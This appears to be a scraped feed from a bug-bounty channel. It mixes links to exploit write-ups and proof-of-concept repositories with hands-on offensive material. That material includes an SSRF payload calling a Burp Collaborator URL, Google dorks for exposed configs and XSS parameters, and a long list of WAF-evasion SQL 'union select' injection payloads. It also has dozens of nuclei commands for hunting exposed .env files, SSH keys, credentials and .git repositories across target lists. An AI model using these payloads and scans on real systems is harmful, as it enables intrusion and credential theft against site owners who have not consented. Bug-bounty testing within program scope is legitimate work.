2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Black Hat USA 2025 Slides and files
Conference presentation slides
🔼GitHub
🔼InfoCon
❤ Share & Support & Reaction Us
🧩 #event
Hey Hunter's,
DarkShadow here back again!
SSRF in pdf generation!
this api endpoint send the pdf generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src=‘burp collab url’ />
comes 200ok and hit request in burp collaborator.
You can follow me in my x.com/darkshadow2bd
#ssrf #bugbountytips
☄️ Cheapest VPS for Bug Bounty & Pentesting
⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3
☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
✨ https://github.com/jonaslejon/malicious-pdf
#exploit
#AppSec
#Threat_Research
1⃣ Zimbra Exploit Analysis (CVE-2025-27915)
https://strikeready.com/blog/0day-ics-attack-in-the-wild
// These exploits take advantage of .ics files to breach vulnerable systems
2⃣ Notepad++ DLL Hijacking (CVE-2025-56383)
https://github.com/zer0t0/CVE-2025-56383-Proof-of-Concept
// If the threat actor has the ability to replace an applications DLL, they would have to ability to put malware directly in the same location...
3⃣ Lenovo Display Control Center - A simple ACL Exploit (CVE-2024-2175)
https://neodyme.io/de/blog/lenovo_dcc_lpe_logic
// Two operating methods are presented for achieving local administrative access: a race condition-based approach and a junction path exploitation technique
🔥FRESH BB TARGET - https://visioninstitutecolorado.com/.well-known/security.txt
Читать полностью…
I request a small support in boosting my channel where it help me to be more consistent and more active...
/channel/boost/bugbounty_tech
based on the poll, i have understood is the members of group are looking for AI content too.. thanks for all the responses and i will make plan what content should be add here and what not .
Читать полностью…
↳ Pentest References and CheatSheets
• Hacking Articles
• Hack Tricks
• Cloud Hack Tricks
• Chryzsh Pentest Book
• Total OSCP Guide
• Hack The Box OSCP Preparation
• Steflan Security
• SecWiki
• Hausec
• HighOnCoffee
• six2dez pentest-book
• 0xffsec Handbook
• haax's Cheatsheet
• golinuxcloud
• Pentest Monkey
• Web App Testing Guide
• XSS CheatSheet
• Payload Box
• Steganography Tools
• Metasploit Unleashed
• Payloads All The Things
• Mobile Security Testing Guide
• WADComs
• LOLBAS
• explainshell
#infosec #cybersecurity #bugbounty #pentest #cheatsheet
A library of tools for vibe coding
https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools
https://zhero-web-sec.github.io/writeups/
https://samcurry.net/
https://shubs.io/
https://dhiyaneshgeek.github.io/
https://bhavukjain.com/
https://rhynorater.github.io/
https://m0chan.github.io/
https://spaceraccoon.dev/
https://ott3rly.com/
https://www.jhaddix.com/blog
https://hackerrishad.me/
/channel/ChatGPT_General_Bot?start=_tgr_jAjHdy84OTAx
Читать полностью…
BB Target - https://cybozu.co.jp/en/company/products/bug-bounty/
Читать полностью…
https://www.youtube.com/watch?v=griDEeIcXQc
Читать полностью…
Hey Hunter's,
DarkShadow here back again, just dropping a list of queries.
30K+ Search Queries 🚀
(Google | Shodan | FOFA)
For hunters, red teamers & OSINT warriors:
⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision
GitHub →https://github.com/projectdiscovery/awesome-search-queries
Show your love Guy's ❤️
#bugbountytips #osint
🌀Download all bug bounty programs domains in scope items 🎯
😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥
👇🏼Step 1: Download the domains.txt file
📂step 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
📂Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions❤️
🔥Oneliner to download ALL of @assetnote's wordlists:
⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off
Google Dork - XSS Prone Parameters 🔥site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&
🔥Google Dork - Exposed Configs 🔍site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json©TakSec
https://x.com/livingdevops/status/1974105605431349682?t=zhTSA-5rSrgr27dqGo-QSw&s=35
Читать полностью…
🔥BB TARGET - https://www.lockheedmartin.com/en-us/contact/vulnerability-disclosure-policy.html
Читать полностью…
Johnermac
>eJPT
>eCPPTv2
>PNPT
>eWPTXv2
>Active Directory Exploitation
>CRTP
>CRTE
>CLOUD
>CONTAINER
Link 🔗:-
https://johnermac.github.io/
#Tech_book
#Sec_code_review
"Node.js Secure Coding:
Defending Against Command Injection Vulnerabilities",
July 2023.
// Learn about secure coding practices with Node.js based on realworld CVE vulnerabilities in popular open-source npm packages: 12 Vulnerable npm Packages, 33 Self-assessment Questions, 10 Chapters
Automating API Vulnerability Testing Using Postman Workflows
https://haymiz.dev//security/2024/04/27/automating-apis-with-postman-workflows/
⚡Sn1per - Automate your recon like never before!
✅ https://github.com/1N3/Sn1per
Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
Active Directory Pentesting
https://exploit-notes.hdks.org/exploit/windows/active-directory/
🔥 Find Low Hanging Fruits Using Nuclei AI 🔥nuclei -list targets.txt -ai "Find exposed AI/ML model files (.pkl, .h5, .pt) that may leak proprietary algorithms or sensitive training data"
nuclei -list targets.txt -ai "Find exposed automation scripts (.sh, .ps1, .bat) revealing internal tooling or credentials"
nuclei -list targets.txt -ai "Identify misconfigured CSP headers allowing 'unsafe-inline' or wildcard sources"
nuclei -list targets.txt -ai "Detect pages leaking JWT tokens in URLs or cookies"
nuclei -list targets.txt -ai "Identify overly verbose error messages revealing framework or library details"
nuclei -list targets.txt -ai "Find application endpoints with verbose stack traces or source code exposure"
nuclei -list targets.txt -ai "Find sensitive information in HTML comments (debug notes, API keys, credentials)"
nuclei -list targets.txt -ai "Find exposed .env files leaking credentials, API keys, and database passwords"
nuclei -list targets.txt -ai "Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."
nuclei -list targets.txt -ai "Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."
nuclei -list targets.txt -ai "Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."
nuclei -list targets.txt -ai "Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."
nuclei -list targets.txt -ai "Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."
nuclei -list targets.txt -ai "Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."
nuclei -list targets.txt -ai "Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"
nuclei -list targets.txt -ai "Identify open directory listings exposing sensitive files"
nuclei -list targets.txt -ai "Find exposed .git directories allowing full repo download"
nuclei -list targets.txt -ai "Find exposed .svn and .hg repositories leaking source code"
nuclei -list targets.txt -ai "Identify open FTP servers allowing anonymous access"
nuclei -list targets.txt -ai "Find GraphQL endpoints with introspection enabled"
nuclei -list targets.txt -ai "Identify exposed .well-known directories revealing sensitive data"
nuclei -list targets.txt -ai "Find publicly accessible phpinfo() pages leaking environment details"
nuclei -list targets.txt -ai "Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"
nuclei -list targets.txt -ai "Identify exposed .vscode and .idea directories leaking developer configs"
nuclei -list targets.txt -ai "Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"
nuclei -list targets.txt -ai "Find exposed WordPress debug.log files leaking credentials and error messages"
nuclei -list targets.txt -ai "Detect misconfigured CORS allowing wildcard origins ('*')"
nuclei -list targets.txt -ai "Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"
nuclei -list targets.txt -ai "Find exposed admin panels with default credentials"
nuclei -list targets.txt -ai "Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."
nuclei -list targets.txt -ai "Detect web applications running in debug mode, potentially exposing sensitive system information."